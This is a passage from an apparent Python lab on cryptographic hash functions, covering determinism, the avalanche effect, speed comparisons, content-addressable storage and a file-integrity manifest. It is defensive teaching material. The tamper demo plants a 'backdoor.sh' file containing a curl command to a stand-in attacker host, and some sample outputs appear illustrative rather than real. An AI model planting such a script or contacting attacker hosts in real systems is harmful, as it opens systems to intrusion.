← Cryptography Fundamentals
Lab

Lab: Hash Functions in Practice

20 min Python

Goal

Write a Python program that demonstrates the core properties of cryptographic hash functions: determinism, the avalanche effect, performance differences between algorithms, content-addressable storage, and tamper detection.

Setup

You need Python 3.8 or later. No external packages are required – this lab uses only standard-library modules: hashlib, time, os, and tempfile.

Create a file called hashing_lab.py.

Step 1: Hash a String with SHA-256

Start by hashing a simple string and inspecting the output.

import hashlib

# hashlib works on bytes, so the input is a bytes literal rather than a str.
message = b"Cryptography is the practice of secure communication."

# Feed the message into a SHA-256 hasher, then read the digest back as hex text.
hasher = hashlib.sha256()
hasher.update(message)
digest = hasher.hexdigest()

hex_chars = len(digest)  # each hex character encodes 4 bits
print(f"Input:  {message.decode()}")
print(f"SHA-256: {digest}")
print(f"Digest length: {hex_chars} hex chars = {hex_chars * 4} bits")

Run the program:

python3 hashing_lab.py
Input:  Cryptography is the practice of secure communication.
SHA-256: a0521af882e7e05ab8857f84e498e28c87b6909812bdef9564c31b4658e4986b
Digest length: 64 hex chars = 256 bits

The output is always 64 hexadecimal characters (256 bits) regardless of input size. Run it again – the hash is identical. Same input, same output, every time.

Step 2: Demonstrate the Avalanche Effect

Change a single character in the input and compare the two hashes.

import hashlib

# Two inputs that differ only in their final character.
original = b"Cryptography is the practice of secure communication."
modified = b"Cryptography is the practice of secure communication!"

hash_original, hash_modified = (
    hashlib.sha256(text).hexdigest() for text in (original, modified)
)

print(f"Original: {hash_original}")
print(f"Modified: {hash_modified}")

# Hex-level view: compare the two digests position by position.
diff_count = sum(a != b for a, b in zip(hash_original, hash_modified))
print(f"Differing hex chars: {diff_count} / {len(hash_original)}")

# Bit-level view: XOR leaves a 1 exactly where the digests disagree,
# so counting the 1s gives the number of differing bits.
xor_of_digests = int(hash_original, 16) ^ int(hash_modified, 16)
bit_diff = bin(xor_of_digests).count("1")
print(f"Differing bits: {bit_diff} / 256 ({bit_diff / 256 * 100:.1f}%)")
Original: a0521af882e7e05ab8857f84e498e28c87b6909812bdef9564c31b4658e4986b
Modified: 6fda8d077c6933acbc8e86c2e1efc42da3dbde21e40f2c7c1c0e9c5ae5f3e793
Differing hex chars: 62 / 64
Differing bits: 133 / 256 (52.0%)

Changing a period to an exclamation mark – a single character – flips roughly half the bits. There is no observable relationship between similar inputs and their hashes. This is the avalanche effect.

Step 3: Compare Algorithm Performance

Time how long each algorithm takes to hash a 10 MB block of data.

import hashlib
import time

MIB = 1024 * 1024

data = b"A" * (10 * MIB)  # 10 MB
algorithms = ["md5", "sha256", "sha3_256"]

print(f"Hashing {len(data) // MIB} MB with each algorithm:\n")

for name in algorithms:
    hasher = hashlib.new(name)  # construction happens outside the timed region
    started = time.perf_counter()
    hasher.update(data)
    digest = hasher.hexdigest()
    elapsed = time.perf_counter() - started
    mb_per_second = len(data) / elapsed / MIB
    print(f"{name:>10}: {elapsed:.4f}s  ({mb_per_second:.0f} MB/s)  digest={digest[:16]}...")
Hashing 10 MB with each algorithm:

       md5: 0.0082s  (1220 MB/s)  digest=a27e5f34b8191de4...
    sha256: 0.0134s  (746 MB/s)  digest=4b5f65a98b3a88f6...
  sha3_256: 0.0228s  (439 MB/s)  digest=0c38e0f8f4e5a3d6...

Exact numbers vary by machine. In this run MD5 is fastest (and broken), SHA-256 is the standard middle ground, and SHA-3 is slowest (different internal construction). This ordering is typical but not guaranteed: on CPUs with hardware SHA acceleration, SHA-256 can match or even beat MD5. Either way, speed is not a reason to choose MD5 – security is the deciding factor.

Step 4: Build a Content-Addressable Store

Use hash values as filenames to create a simple content-addressable store, similar to how git stores objects.

import hashlib
import os
import tempfile

store_dir = tempfile.mkdtemp(prefix="cas_")
print(f"Store directory: {store_dir}\n")


def store(content: bytes) -> str:
    """Store content under its SHA-256 hex digest and return that digest.

    The object file is opened in exclusive-create mode ("xb"), so checking
    for an existing object and creating a new one happen in a single step.
    A separate exists-then-open sequence could overwrite an object that
    appeared between the check and the write.

    Args:
        content: The raw bytes to store.

    Returns:
        The 64-character hex digest that serves as the object's key
        (and as its filename inside ``store_dir``).
    """
    key = hashlib.sha256(content).hexdigest()
    path = os.path.join(store_dir, key)
    try:
        # "x" raises FileExistsError instead of truncating an existing file.
        with open(path, "xb") as f:
            f.write(content)
    except FileExistsError:
        print(f"  Already exists:    {key[:16]}...")
    else:
        print(f"  Stored new object: {key[:16]}...")
    return key


def retrieve(key: str) -> bytes:
    """Return the raw bytes of the stored object whose hash key is ``key``."""
    object_path = os.path.join(store_dir, key)
    with open(object_path, "rb") as source:
        payload = source.read()
    return payload


# Two distinct documents; the first one is stored twice to show deduplication
first_doc = b"First document content."
second_doc = b"Second document content."

k1 = store(first_doc)
k2 = store(second_doc)
k3 = store(first_doc)  # same bytes as k1, so the same key comes back

print(f"\nk1 == k3: {k1 == k3}")
object_count = len(os.listdir(store_dir))
print(f"Unique objects in store: {object_count}")

# Read the first document back using nothing but its key
retrieved = retrieve(k1)
print(f"Retrieved: {retrieved.decode()}")
Store directory: /tmp/cas_xxxxxxxx

  Stored new object: 8b3a4e5c1f2d7a90...
  Stored new object: 3d92f1a7b6c8e054...
  Already exists:    8b3a4e5c1f2d7a90...

k1 == k3: True
Unique objects in store: 2
Retrieved: First document content.

Identical content always produces the same hash, so duplicates are automatically deduplicated. This is the same principle behind git object storage and Docker image layers.

Step 5: Detect File Tampering

Compute a hash manifest for a set of files, then detect when a file is modified.

import hashlib
import os
import tempfile


def hash_file(path: str) -> str:
    """Return the SHA-256 hex digest of the file at ``path``.

    The file is read in 8192-byte chunks and fed to the hasher piece by
    piece, so the whole file never has to be held in memory at once.
    """
    hasher = hashlib.sha256()
    with open(path, "rb") as stream:
        # read() returns b"" at end of file, which ends the loop
        while block := stream.read(8192):
            hasher.update(block)
    return hasher.hexdigest()


def build_manifest(directory: str) -> dict:
    """Map each regular file directly inside ``directory`` to its SHA-256 digest.

    Entries are visited in sorted name order. Anything that is not a
    regular file (for example a subdirectory) is left out of the manifest.
    """
    return {
        entry: hash_file(os.path.join(directory, entry))
        for entry in sorted(os.listdir(directory))
        if os.path.isfile(os.path.join(directory, entry))
    }


def verify_manifest(directory: str, manifest: dict) -> list:
    """Compare the files in ``directory`` with ``manifest`` and report differences.

    Returns a list of preformatted report lines: NEW for files missing from
    the manifest, MODIFIED for files whose hash no longer matches, and
    DELETED for manifest entries with no file on disk. An empty list means
    everything matches.
    """
    findings = []
    seen = set()

    for entry in sorted(os.listdir(directory)):
        full_path = os.path.join(directory, entry)
        if not os.path.isfile(full_path):
            continue  # only regular files are tracked
        seen.add(entry)
        if entry not in manifest:
            findings.append(f"  NEW:      {entry}")
            continue
        if hash_file(full_path) != manifest[entry]:
            findings.append(f"  MODIFIED: {entry}")

    # Anything recorded in the manifest but not found on disk has been removed
    findings.extend(
        f"  DELETED:  {entry}" for entry in manifest if entry not in seen
    )
    return findings


# Create a scratch directory holding the two files to protect
test_dir = tempfile.mkdtemp(prefix="integrity_")
initial_files = {
    "config.txt": b"port=8080",
    "data.csv": b"a,b,c\n1,2,3",
}
for filename, payload in initial_files.items():
    with open(os.path.join(test_dir, filename), "wb") as out:
        out.write(payload)

# Record the known-good hashes
manifest = build_manifest(test_dir)
print("Initial manifest:")
for filename, file_digest in manifest.items():
    print(f"  {filename}: {file_digest[:16]}...")

# Simulate an attacker: change an existing file ...
config_path = os.path.join(test_dir, "config.txt")
with open(config_path, "wb") as out:
    out.write(b"port=9999")

# ... and drop in a file that was never part of the manifest
backdoor_path = os.path.join(test_dir, "backdoor.sh")
with open(backdoor_path, "wb") as out:
    out.write(b"#!/bin/sh\ncurl evil.example.com")

# Re-check the directory against the recorded hashes
print("\nVerification after tampering:")
problems = verify_manifest(test_dir, manifest)
if not problems:
    print("  All files OK.")
else:
    print("  Integrity check FAILED:")
    print("\n".join(problems))
Initial manifest:
  config.txt: 3a7d8b2e1f4c6590...
  data.csv: 9e1f3a5b7d2c8046...

Verification after tampering:
  Integrity check FAILED:
  NEW:      backdoor.sh
  MODIFIED: config.txt

The manifest detected both the modified file and the unauthorized new file. This is the same principle behind Subresource Integrity (SRI) in browsers and package manager checksums.

Summary

This lab demonstrated five properties of cryptographic hash functions using standard Python: